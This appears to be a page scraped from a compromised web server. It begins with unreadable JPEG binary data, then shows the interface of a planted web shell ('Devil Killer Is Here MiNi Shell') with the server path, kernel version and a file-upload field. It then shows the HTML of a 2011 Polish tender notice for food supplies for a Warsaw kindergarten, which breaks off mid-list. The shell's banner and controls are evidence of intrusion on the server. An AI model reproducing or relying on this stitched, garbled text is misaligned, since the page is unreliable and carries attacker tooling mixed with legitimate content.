JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20111202/410270-N-2011.html

<p class="kh_header"><b>Warszawa: Dostawa artykułów spożywczych z podziałem na 9 pakietów</b><br>
<b>Numer ogłoszenia: 410270 - 2011; data zamieszczenia: 02.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Nr 24 , ul. Drewniana 10/16, 00-345 Warszawa, woj. mazowieckie, tel. 22 826 42 63, faks 22 826 42 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.p24.przedszkola.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych z podziałem na 9 pakietów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych z podziałem na 9 pakietów: 
1) PIECZYWO, PIECZYWO CUKIERNICZE
2) MLEKO I JEGO PRZETWORY
3) MIĘSO, WĘDLINY
4) ŚWIEŻA WARZYWA I OWOCE
5) RÓŻNE ARTYKUŁY SPOŻYWCZE
6) JAJA
7) RYBY
8) MROŻONKI
9) WODA.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.86.00.00-4, 15.50.00.00-3, 15.81.00.00-9, 03.22.22.00-5, 15.33.11.00-8, 03.31.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian. Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.p24.przedszkola.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Nr 24
ul. Drewniana 10/16
00-345 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2011 godzina 10:00, miejsce: Przedszkole Nr 24
ul. Drewniana 10/16
00-345 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO I WYROBY CUKIERNICZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka długa, wrocławska, świeża - 250 g	
szt.	
875,

Chałka tradycyjna, świeża - 310 g	
szt.	
312,

Chleb biały, pszenny, świeży - 570  g	
szt.	
940,
Chleb razowy wieloziarnisty, świeży - 500 g	
szt.	
500,

Kajzerki świeże - 50g	
szt.	
440,

Pączki  z marmoladą	
szt.	
560,

Drożdżówki - różne smaki	
szt.	
1000,

Bułki grahamki  świeże  - 350g	
szt.	
440,

Bułeczki mini - mleczne  0,30g	
szt.	
750,
Bułka długa, wrocławska, świeża - 250 g	
szt.	
875.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MLEKO I JEGO PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko pasteryzowane, homogenizowane o zawartości tłuszczu 3,2%, pakowane w folię o pojemności 1l
	
litr	
5100,

Masło świeże w kostkach , zawartość tłuszczu min 67%, opak. 200g
	
szt.	
880,

Masło roślinne pakowane w kubeczki plastikowe o  poj. 250 g - zawartość tłuszczu 80%
	
szt.	
375,

Śmietana 30 % tłuszczu w opakowaniach plastik -400ml
	
szt.	
25,

Śmietana o zawartości tłuszczu 18 % opak. plastikowe o poj. 400 ml
	
szt.	
1060,

Serek twarogowy typu almette, śmietankowy , opak. 150 g 
	
szt.	
90,

Ser topiony śmietankowy w bloczkach  -100 g
	
szt.	
190,

Ser żółty gouda tłusty, pakowany w bloczkach
 do 1500 g
	
kg	
75,

Jogurt owocowy bez kawałków owoców, pakowany 
w kubeczki plastikowe o poj. -  125 g
	
szt.	
1000,

Jogurt owocowy bez kawałków owoców, pakowany 
w kubeczki plastikowe o poj. - . 130 g
	
szt.	
875,

Jogurt owocowy bez kawałków owoców, pakowany 
w kubeczki plastikowe o poj. -  115 g
	
szt.	
2125,

Twaróg mielony, pakowany w wiaderka o poj. 1000 g
	kg	
350.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> MIĘSO I WĘDLINY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z piersi indyka bez skóry, elementy świeże
	
kg	
50,
Udziec z indyka z kością, bez skóry elementy świeże	
kg	
64,

Filet z kurczaka bez skóry, elementy świeże
	kg	
45,

Kurczaki - tuszki surowe, świeże
	kg	
32,

Pałeczki z kurczaka, surowe, elementy świeże
	kg	
140,

Schab wieprzowy b/k, surowy, elementy świeże
	kg	
50,

Schab wieprzowy z kością, surowy, elementy świeże
	
kg	
40,

Wieprzowina łopatka, surowa, bez kości, elementy świeże	kg	
150,

Wieprzowina - szynka surowa, bez kości, elementy świeże	kg	
40,

Łopatka cielęca, bez kości, elementy świeże
	
kg	
38,

Udziec wołowy bez koci, elementy świeże
	
kg	
50,
Pręga wołowa surowa, bez kości, elementy świeże	
kg	
25,

Kiełbasa sucha, typu  krakowska
	kg	
15,

Kiełbasa  typu  podwawelska
	kg	
32,

Parówki wieprzowe - odtłuszczone, świeże
	kg	
64,

Polędwica z indyka - wędlina	kg	
32,
Szynka wieprzowa - bez tłuszczu - parzona	kg	
65,

Polędwica  wieprzowa typu  sopocka	kg	
38,
Kiełbasa szynkowa  wieprzowa	kg	
32,

Baleron wieprzowy gotowany - wędlina	kg	
7,

Kiełbasa sucha typu żywiecka	kg	
7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ŚWIEŻE WARZYWA I OWOCE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Botwina świeża w pęczkach	
pęczki	
15,
Buraki  czerwone,  świeże, bez liści, nie nadmarznięte bez   śladów uszkodzeń mechanicznych i zepsucia	
kg	
130,
Cebula świeża bez szczypiorku, krucha nie nadmarznięta	
kg	
150,
Dynia świeża, dojrzała, bez uszkodzeń i oznak zepsucia	
kg	
18,
Fasolka szparagowa  świeża, bez uszkodzeń	
kg	
32,
Kalafior świeży, bez uszkodzeń, jędrny duży	
szt.	
100,
Kapusta głowiasta, biała, świeża nie nadmarznięta, bez uszkodzeń	
kg	
180,
Kapusta kiszona - wiaderko 3 kg	
kg	
100,
Kapusta pekińska, nie nadmarznięta, bez uszkodzeń	
kg	
110,
Kapusta włoska, nie nadmarznięta, bez uszkodzeń	
kg	
50,
Kapusta czerwona, głowiasta, nie nadmarznięta bez śladów uszkodzeń	
kg	
50,
Koper świeży, czysty w pęczkach	
pęczki	
250,
Marchew bez naci, świeża, sucha, nie nadmarznięta, bez zmian uszkodzeń	
kg	
1000,
Natka pietruszki, czysta, świeża w pęczkach	
szt.	
320,
Ogórki  świeże, czyste bez uszkodzeń	
kg	
170,
Ogórki kwaszone, jędrne w  wiaderku - 3 kg	
kg	
200,
Ogórki małosolne, pakowane w wiaderko - 3 kg	
kg	
8,
Papryka czerwona, świeża, zdrowa bez uszkodzeń	
kg	
75,
Pieczarki czyste, świeże, bez uszkodzeń	
kg	
38,
Pietruszka korzeniowa, świeża bez uszkodzeń	
kg	
280,
Pomidory świeże, zdrowe bez uszkodzeń	
Kg	
375,
Pory czyste, świeże	
kg	
150,
Rzodkiewka czysta bez uszkodzeń, pakowana w pęczki	
pęczki	
340,
Sałata zielona, czysta, zdrowa	
szt.	
438,
Seler korzeniowy, świeży bez uszkodzeń	
kg	
220,
Szczypiorek drobny, czysty, pakowany w pęczki	
pęczki	
180,
Ziemniaki nie  zzieleniałe , czyste, suche nie zmarznięte nie kiełkujące, bez uszkodzeń	
kg	
3000,
Gruszki świeże, słodkie, dojrzałe bez uszkodzeń	
kg	
120,
Jabłka kruche, słodkie nie nadmarznięte bez  śladów  uszkodzeń	
kg	
1500,
Brzoskwinie krajowe	
kg	
50,
Morele  krajowe	
kg	
30,
Truskawki świeże, czyste, suche, pakowane w łubianki po 2kg	kg	60,
Śliwki świeże, słodkie	
kg	
140,
Arbuzy świeże - dojrzały, bez uszkodzeń	
kg	
40,
Banany- średnio dojrzale, nie nadmarznięte bez uszkodzeń mechanicznych	
kg	
750,
Cytryny świeże, dojrzale bez oznak zepsucia, bez uszkodzeń mechanicznych	
kg	
30,
Mandarynki - bez pestek, słodkie nie nadmarznięte bez uszkodzeń mechanicznych	
kg	
200,
Pomarańcze - świeże, słodkie nie nadmarznięte, bez śladów uszkodzeń mechanicznych i zepsucia	
kg	
30,
Winogrona zielone, świeże, bez pestek, słodkie, nie zepsute  bez śladów uszkodzeń mechanicznych	
kg	
50,
Melony dojrzale, nie nadmarznięte , bez śladów uszkodzeń mechanicznych	
kg	
30,
Nektarynki dojrzale, nie nadmarznięte, bez śladów uszkodzeń mechanicznych	
kg	
20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> RÓŻNE ARTYKUŁY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas plastry w syropie puszka 565g	szt.	19,

Brzoskwinie połówki w puszce  820 g	
szt.	
19,

Batony w czekoladzie a 90g	
szt.	
375,

Bułka tarta - 400 g	
szt.	
250,

Budyń waniliowy lub śmietankowy bez szt.ucznych barwników 63 g	
szt.	
250,

Biszkopty delikatne, długie, bez nadzienia pakowane w folię 150 g	
szt.	
38,
Biszkopty okrągłe, bez nadzienia - 150 g	
szt.	
88,
Biszkopty z nadzieniem, w polewie czekoladowej, 1300 g	
szt.	
19,

Bułeczki mleczne pakowane w torby foliowe 400 g	
szt.	
100,

Cynamon 30 g	
szt.	
13,

Chrzan  tarty w słoikach 260 g	
szt.	
8,

Ciasteczka kruche - na  wagę	
kg	
20,
Ciastka - wafelki, w polewie czekoladowej - na wagę	kg	25,
Ciastka - herbatniki - typu Be - be 16 g	szt.	880,

Cukier biały, sypki, pakowany w torby a 1000 g	
szt.	
515,

Cukier puder a 500g l	
szt.	
25,

Cukier waniliowy a  16 g	
szt.	
240,

Cukierki czekoladowe i z galaretką	
kg	
25,

Drożdże a 100 g	
szt.	
25,
Dżem owocowy z zawartością owocu 45 g w 100g wyrobu gotowego słoik ok. 300g	szt.	
200,


Galaretka - bez sztucznych konserwantów ok. 75 g	
szt.	
60,

Groszek konserwowy - puszka ok. 400 g	
szt.	
20,

Groch nasiona suche	
kg	
25,

Herbata czarna granulowana, ok. 100 g	
szt.	
90,

Herbata owocowa - ekspresowa , pakowana w kartony po 20 szt. - 80 g	
szt.	
150,
Kasza jęczmienna perłowa 400	kg	45,
Kakao proszek  o obniżonej zawartości tłuszczu  - pudelka - 100g	
szt.	
160,

Kasza gryczana 500 g	
kg	
45,

Kasza manna  400 g	
kg	
32,
Kawa zbożowa  150 g	
szt.	
32,
Ketchup łagodny , butelki plastikowe - 480 g	szt.	20,
Koncentrat pomidorowy 30% - w słoikach  - 190 g	
szt.	
180,
Kukurydza konserwowa - puszki - 425 g	szt.	40,
Kisiel o smaku truskawkowym i wiśniowym z cukrem , bez sztucznych barwników, pakowany w torebki - 77 g	szt.	440,

Krem czekoladowy - typu nutella - słoik 230 g	
szt.	
65,

Kwasek cytrynowy pakowany w torebki - 20 g	
szt.	
15,

Liście laurowe  - suszone, torebki - 20g	
szt.	
7,

Majeranek 14 g	
szt.	
18,

Majonez  w słoiku - 200 g	
szt.	
70,

Makaron świderki- 4 jajeczny - 500 g	
kg	
200,

Makaron krajanka 4 jajeczny - 400 g	
kg	
50,

Makaron nitki - 4 jajeczny - 250 g	
kg	
32,
Makaron muszelki - 4 jajeczny - 500 g	kg	50,

Mąka pszenna 1000 g	
kg	
375,

Mąka ziemniaczana -500 g	
kg	
35,

Mięta ekspresowa, pakowana po 20 saszetek - 40 g	
szt.	
40,

Miód pszczeli naturalny  w słoiku 400 g	
szt.	
20,

Musztarda łagodna w słoiku -  200 g	
szt.	
8,

Olej rzepakowy z pierwszego tłoczenia   - butelki o pojemności  1l	
litr	
180,

Pieprz prawdziwy, czarny, mielony - 20 g	
szt.	
40,

Fasola sucha - średnio-gruba  - 400 g	
szt.	
25,

Płatki czekoladowe lub cynamonowe  - 250 g	
szt.	
50,

Płatki owsiane a 400 g	
szt.	
25,

Płatki kukurydziane  - 250 g	
szt.	
140,
Płatki ryżowe błyskawiczne - 400 g	
szt.	
90,

Płatki jęczmienne błyskawiczne - 400 g	
szt.	
65,
Płatki czekoladowe - typu  nestle - 500 g	
szt.	
50,

Ptasie mleczko  - waniliowe  420 g	
szt.	
200,

Proszek do pieczenia  - 18 g	
szt.	
90,

Przyprawa - bazylia suszona  torebki - 10 g	
szt.	
15,

Przyprawa - tymianek suszony - torebki - 10 g	
szt.	
12,

Przyprawa - papryka słodka, mielona - 20 g	
szt.	
25,

Przyprawa mielona do drobiu - 25 g	
szt.	
25,

Rodzynki suszone 200 g	
szt.	
15,

Ryż biały długoziarnisty, sypki, pakowany w torby I klasa  - 1000 g	
kg	
90,

Soki wieloowocowe - bez konserwantów - karton 1l	
szt.	
250,

Sok owocowy 100% , kartonik - 200 ml	
szt.	
500,

Syrop domowy, malinowy i wiśniowy - bez konserwantów - butelki 430 ml	
szt.	
250,
Sos do spaghetti z min zawartością pomidorów 22% słoik a 350 g	
szt.	
125,

Sól kamienna  - torby  - 1000 g	
kg	
90,

Czosnek  sproszkowany - przyprawa - 35 g.	
szt.	
18,

Szczaw konserwowy - słoik 270 g	
szt.	
38,
Wiórki kokosowe - torebki - 75 g	
szt.	
13,

Zacierki - makaron - 4 jajeczny - 250g	
szt.	
38,

Ziele angielskie a 15 g	
szt.	
8,

Żurek typu śląski - bez konserwantów, butelki -480 ml	
szt.	
90,

Przyprawa - pieprz ziołowy  20 g	szt.	18,


Makaron Spaghetti  - 400 g	
szt.	
50,

Czekolada mleczna -  100 g	
szt.	
250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> JAJA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze, świeże, ściółkowe - waga 63 -73g - badane pod względem jakości i przydatności 
do spożycia, pakowane - op. transportowe 
po 30 sztuk
	
szt.	
9000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mintaj mrożony I gatunek - filety mrożone pojedynczo 
 	
kg	
   175,

Paluszki rybne panierowane - mrożone
	
kg	
